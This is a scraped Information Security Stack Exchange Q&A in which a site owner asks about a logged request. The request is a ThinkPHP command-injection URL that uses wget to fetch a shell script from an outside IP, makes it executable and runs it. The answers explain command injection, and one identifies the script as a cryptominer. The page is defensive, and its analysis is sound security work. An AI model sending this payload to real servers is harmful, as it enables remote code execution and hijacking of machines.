How to prevent users from executing commands through browser URLHow to disable Firewire in OpenBSD/Linux to...

What is the purpose of easy combat scenarios that don't need resource expenditure?

Can a long polymer chain interact with itself via van der Waals forces?

Graph with overlapping labels

Why publish a research paper when a blog post or a lecture slide can have more citation count than a journal paper?

Why was Lupin comfortable with saying Voldemort's name?

SET NOCOUNT Error in handling SQL call after upgrade

Flipping axis on a LogPlot

Why would space fleets be aligned?

How does Leonard in "Memento" remember reading and writing?

Non-Cancer terminal illness that can affect young (age 10-13) girls?

Comparing two arrays of unequal length

Consequences of lack of rigour

A title for a history book

What would the chemical name be for C13H8Cl3NO

Can I make estimated tax payments instead of withholding from my paycheck?

What are "industrial chops"?

Cookies - Should the toggles be on?

Can a person refuse a presidential pardon?

Is a new Boolean field better than a null reference when a value can be meaningfully absent?

What is the difference between rolling more dice versus fewer dice?

Am I a Rude Number?

How would an AI self awareness kill switch work?

Making him into a bully (how to show mild violence)

kill -0 <PID> は何をするのでしょうか?



How to prevent users from executing commands through browser URL


How to disable Firewire in OpenBSD/Linux to prevent attacks through Firewire?Executing arbitrary commands through iptables-restore inputTracking checkins from generic usersHow to prevent future attacks from Trojan.Agent.Linux.A?Unprivileged user sends commands to init (systemd), how could he get root?How to manually detect and remove Linux.BackDoor.FakeFile.1 from linux system through the command line?How to prevent documents from being stolen via Linux live CDHow to prevent Tails OS from accessing hard drive?From a security standpoint is there anything wrong with running repetitive putty commands from the command line?Prevent apps from having full access to user files













3















I have very little experience with security (Still learning) however was combing through my logs and I noticed the following request:



"GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://86.105.49.215/a.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; HTTP/1.1" 200 16684 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"


Now first of all this made no sense to me with the exception of chmod 777 which tells me someone was trying to change my file permissions.



My question is what kind of attack is this and what steps can I take to prevent it?










share|improve this question







New contributor




user3718908 is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.

























    3















    I have very little experience with security (Still learning) however was combing through my logs and I noticed the following request:



    "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://86.105.49.215/a.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; HTTP/1.1" 200 16684 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"


    Now first of all this made no sense to me with the exception of chmod 777 which tells me someone was trying to change my file permissions.



    My question is what kind of attack is this and what steps can I take to prevent it?










    share|improve this question







    New contributor




    user3718908 is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
    Check out our Code of Conduct.























      3












      3








      3


      1






      I have very little experience with security (Still learning) however was combing through my logs and I noticed the following request:



      "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://86.105.49.215/a.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; HTTP/1.1" 200 16684 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"


      Now first of all this made no sense to me with the exception of chmod 777 which tells me someone was trying to change my file permissions.



      My question is what kind of attack is this and what steps can I take to prevent it?










      share|improve this question







      New contributor




      user3718908 is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
      Check out our Code of Conduct.












      I have very little experience with security (Still learning) however was combing through my logs and I noticed the following request:



      "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://86.105.49.215/a.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; HTTP/1.1" 200 16684 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"


      Now first of all this made no sense to me with the exception of chmod 777 which tells me someone was trying to change my file permissions.



      My question is what kind of attack is this and what steps can I take to prevent it?







      linux






      share|improve this question







      New contributor




      user3718908 is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
      Check out our Code of Conduct.











      share|improve this question







      New contributor




      user3718908 is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
      Check out our Code of Conduct.









      share|improve this question




      share|improve this question






      New contributor




      user3718908 is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
      Check out our Code of Conduct.









      asked 2 hours ago









      user3718908user3718908

      1183




      1183




      New contributor




      user3718908 is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
      Check out our Code of Conduct.





      New contributor





      user3718908 is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
      Check out our Code of Conduct.






      user3718908 is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
      Check out our Code of Conduct.






















          2 Answers
          2






          active

          oldest

          votes


















          2














          It's a command injection attack in which :




          the goal is execution of arbitrary commands on the host
          operating system via a vulnerable application. Command injection
          attacks are possible when an application passes unsafe user supplied
          data (forms, cookies, HTTP headers etc.) to a system shell. In this
          attack, the attacker-supplied operating system commands are usually
          executed with the privileges of the vulnerable application. Command
          injection attacks are possible largely due to insufficient input
          validation.




          There are many strategies to mitigate or to avoid this kind of attacks you can find somes here and have a look at this cheatsheet from OWASP.






          share|improve this answer
























          • Thank you very much, will read more about it.

            – user3718908
            7 secs ago



















          2














          As stated before, it's a command injection attack that attempts to download a .sh script, grant it permissions to run and then execute it.
          The script in this case is a bitcoin miner.



          The recommendations in the OWASP guide that Soufiane should be followed to ensure your web application is secure, but for an extra layer of security a Web Application Firewall can be used which will block requests like these before they reach your server process.






          share|improve this answer








          New contributor




          Veyf is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
          Check out our Code of Conduct.




















            Your Answer








            StackExchange.ready(function() {
            var channelOptions = {
            tags: "".split(" "),
            id: "162"
            };
            initTagRenderer("".split(" "), "".split(" "), channelOptions);

            StackExchange.using("externalEditor", function() {
            // Have to fire editor after snippets, if snippets enabled
            if (StackExchange.settings.snippets.snippetsEnabled) {
            StackExchange.using("snippets", function() {
            createEditor();
            });
            }
            else {
            createEditor();
            }
            });

            function createEditor() {
            StackExchange.prepareEditor({
            heartbeatType: 'answer',
            autoActivateHeartbeat: false,
            convertImagesToLinks: false,
            noModals: true,
            showLowRepImageUploadWarning: true,
            reputationToPostImages: null,
            bindNavPrevention: true,
            postfix: "",
            imageUploader: {
            brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
            contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/3.0/"u003ecc by-sa 3.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
            allowUrls: true
            },
            noCode: true, onDemand: true,
            discardSelector: ".discard-answer"
            ,immediatelyShowMarkdownHelp:true
            });


            }
            });






            user3718908 is a new contributor. Be nice, and check out our Code of Conduct.










            draft saved

            draft discarded


















            StackExchange.ready(
            function () {
            StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fsecurity.stackexchange.com%2fquestions%2f204459%2fhow-to-prevent-users-from-executing-commands-through-browser-url%23new-answer', 'question_page');
            }
            );

            Post as a guest















            Required, but never shown

























            2 Answers
            2






            active

            oldest

            votes








            2 Answers
            2






            active

            oldest

            votes









            active

            oldest

            votes






            active

            oldest

            votes









            2














            It's a command injection attack in which :




            the goal is execution of arbitrary commands on the host
            operating system via a vulnerable application. Command injection
            attacks are possible when an application passes unsafe user supplied
            data (forms, cookies, HTTP headers etc.) to a system shell. In this
            attack, the attacker-supplied operating system commands are usually
            executed with the privileges of the vulnerable application. Command
            injection attacks are possible largely due to insufficient input
            validation.




            There are many strategies to mitigate or to avoid this kind of attacks you can find somes here and have a look at this cheatsheet from OWASP.






            share|improve this answer
























            • Thank you very much, will read more about it.

              – user3718908
              7 secs ago
















            2














            It's a command injection attack in which :




            the goal is execution of arbitrary commands on the host
            operating system via a vulnerable application. Command injection
            attacks are possible when an application passes unsafe user supplied
            data (forms, cookies, HTTP headers etc.) to a system shell. In this
            attack, the attacker-supplied operating system commands are usually
            executed with the privileges of the vulnerable application. Command
            injection attacks are possible largely due to insufficient input
            validation.




            There are many strategies to mitigate or to avoid this kind of attacks you can find somes here and have a look at this cheatsheet from OWASP.






            share|improve this answer
























            • Thank you very much, will read more about it.

              – user3718908
              7 secs ago














            2












            2








            2







            It's a command injection attack in which :




            the goal is execution of arbitrary commands on the host
            operating system via a vulnerable application. Command injection
            attacks are possible when an application passes unsafe user supplied
            data (forms, cookies, HTTP headers etc.) to a system shell. In this
            attack, the attacker-supplied operating system commands are usually
            executed with the privileges of the vulnerable application. Command
            injection attacks are possible largely due to insufficient input
            validation.




            There are many strategies to mitigate or to avoid this kind of attacks you can find somes here and have a look at this cheatsheet from OWASP.






            share|improve this answer













            It's a command injection attack in which :




            the goal is execution of arbitrary commands on the host
            operating system via a vulnerable application. Command injection
            attacks are possible when an application passes unsafe user supplied
            data (forms, cookies, HTTP headers etc.) to a system shell. In this
            attack, the attacker-supplied operating system commands are usually
            executed with the privileges of the vulnerable application. Command
            injection attacks are possible largely due to insufficient input
            validation.




            There are many strategies to mitigate or to avoid this kind of attacks you can find somes here and have a look at this cheatsheet from OWASP.







            share|improve this answer












            share|improve this answer



            share|improve this answer










            answered 1 hour ago









            Soufiane TahiriSoufiane Tahiri

            1,751417




            1,751417













            • Thank you very much, will read more about it.

              – user3718908
              7 secs ago



















            • Thank you very much, will read more about it.

              – user3718908
              7 secs ago

















            Thank you very much, will read more about it.

            – user3718908
            7 secs ago





            Thank you very much, will read more about it.

            – user3718908
            7 secs ago













            2














            As stated before, it's a command injection attack that attempts to download a .sh script, grant it permissions to run and then execute it.
            The script in this case is a bitcoin miner.



            The recommendations in the OWASP guide that Soufiane should be followed to ensure your web application is secure, but for an extra layer of security a Web Application Firewall can be used which will block requests like these before they reach your server process.






            share|improve this answer








            New contributor




            Veyf is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
            Check out our Code of Conduct.

























              2














              As stated before, it's a command injection attack that attempts to download a .sh script, grant it permissions to run and then execute it.
              The script in this case is a bitcoin miner.



              The recommendations in the OWASP guide that Soufiane should be followed to ensure your web application is secure, but for an extra layer of security a Web Application Firewall can be used which will block requests like these before they reach your server process.






              share|improve this answer








              New contributor




              Veyf is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
              Check out our Code of Conduct.























                2












                2








                2







                As stated before, it's a command injection attack that attempts to download a .sh script, grant it permissions to run and then execute it.
                The script in this case is a bitcoin miner.



                The recommendations in the OWASP guide that Soufiane should be followed to ensure your web application is secure, but for an extra layer of security a Web Application Firewall can be used which will block requests like these before they reach your server process.






                share|improve this answer








                New contributor




                Veyf is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
                Check out our Code of Conduct.










                As stated before, it's a command injection attack that attempts to download a .sh script, grant it permissions to run and then execute it.
                The script in this case is a bitcoin miner.



                The recommendations in the OWASP guide that Soufiane should be followed to ensure your web application is secure, but for an extra layer of security a Web Application Firewall can be used which will block requests like these before they reach your server process.







                share|improve this answer








                New contributor




                Veyf is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
                Check out our Code of Conduct.









                share|improve this answer



                share|improve this answer






                New contributor




                Veyf is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
                Check out our Code of Conduct.









                answered 1 hour ago









                VeyfVeyf

                211




                211




                New contributor




                Veyf is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
                Check out our Code of Conduct.





                New contributor





                Veyf is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
                Check out our Code of Conduct.






                Veyf is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
                Check out our Code of Conduct.






















                    user3718908 is a new contributor. Be nice, and check out our Code of Conduct.










                    draft saved

                    draft discarded


















                    user3718908 is a new contributor. Be nice, and check out our Code of Conduct.













                    user3718908 is a new contributor. Be nice, and check out our Code of Conduct.












                    user3718908 is a new contributor. Be nice, and check out our Code of Conduct.
















                    Thanks for contributing an answer to Information Security Stack Exchange!


                    • Please be sure to answer the question. Provide details and share your research!

                    But avoid



                    • Asking for help, clarification, or responding to other answers.

                    • Making statements based on opinion; back them up with references or personal experience.


                    To learn more, see our tips on writing great answers.




                    draft saved


                    draft discarded














                    StackExchange.ready(
                    function () {
                    StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fsecurity.stackexchange.com%2fquestions%2f204459%2fhow-to-prevent-users-from-executing-commands-through-browser-url%23new-answer', 'question_page');
                    }
                    );

                    Post as a guest















                    Required, but never shown





















































                    Required, but never shown














                    Required, but never shown












                    Required, but never shown







                    Required, but never shown

































                    Required, but never shown














                    Required, but never shown












                    Required, but never shown







                    Required, but never shown







                    Popular posts from this blog

                    Benedict Cumberbatch Contingut Inicis Debut professional Premis Filmografia bàsica Premis i...

                    Monticle de plataforma Contingut Est de Nord Amèrica Interpretacions Altres cultures Vegeu...

                    Escacs Janus Enllaços externs Menú de navegacióEscacs JanusJanusschachBrainKing.comChessV